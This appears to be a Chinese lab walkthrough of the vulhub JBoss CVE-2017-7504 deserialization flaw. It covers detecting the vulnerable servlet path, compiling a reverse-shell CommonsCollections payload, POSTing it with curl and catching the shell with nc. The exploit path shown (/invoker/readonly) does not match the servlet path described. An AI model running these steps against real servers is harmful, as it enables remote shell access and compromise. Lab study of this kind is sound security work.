vulhub之jboss(CVE-2017-7504)

复制代码
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的 HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-7504 漏洞与 CVE-2015-7501 的漏洞原理相似,只是利用的路径不一样, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。

JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。

环境准备

问题:

端口占用

如果默认的8080端口被占用,可以改为:docker run -p 8080:8081 <image_name>

或者修改docker-compose 端口号

漏洞发现

访问your-ip:8080/jbossmq-httpil/HTTPServerILServlet

如出现以下界面,说明存在此漏洞

漏洞利用

进入攻击机,下载反序列化工具

下载地址:GitHub - ianxtianxt/CVE-2015-7501: (CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞

进入目录执行

1、javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

2、java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:监听端口

再用之前生成的.ser文件,通过POST二进制数据上去,使用nc监听端口,即可拿到shell

curl http://目标ip:port/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

相关推荐
ybb_ymm11 分钟前
mysql8在linux下的默认规则修改
linux·运维·数据库·mysql
半梦半醒*13 分钟前
zabbix安装
linux·运维·前端·网络·zabbix
你的人类朋友1 小时前
“签名”这个概念是非对称加密独有的吗?
前端·后端·安全
南尘NCA86661 小时前
企业微信防封防投诉拦截系统:从痛点解决到技术实现
java·网络·企业微信
程序猿费益洲2 小时前
Docker 网络详解:(三)四大网络模式
网络·docker·容器
携欢2 小时前
PortSwigger靶场之CSRF where token validation depends on request method通关秘籍
安全·web安全·csrf
周杰伦_Jay2 小时前
【计算机网络表格图表解析】网络体系结构、数据链路层、网络层、传输层、应用层、网络安全、故障排查
计算机网络·安全·web安全
Mr_Meng_De3 小时前
网络安全认证培训机构的痛点
网络
武文斌773 小时前
复习总结最终版:单片机
linux·单片机·嵌入式硬件·学习
驱动探索者3 小时前
贝尔实验室发展史:20世纪科技圣殿的辉煌与沉浮
linux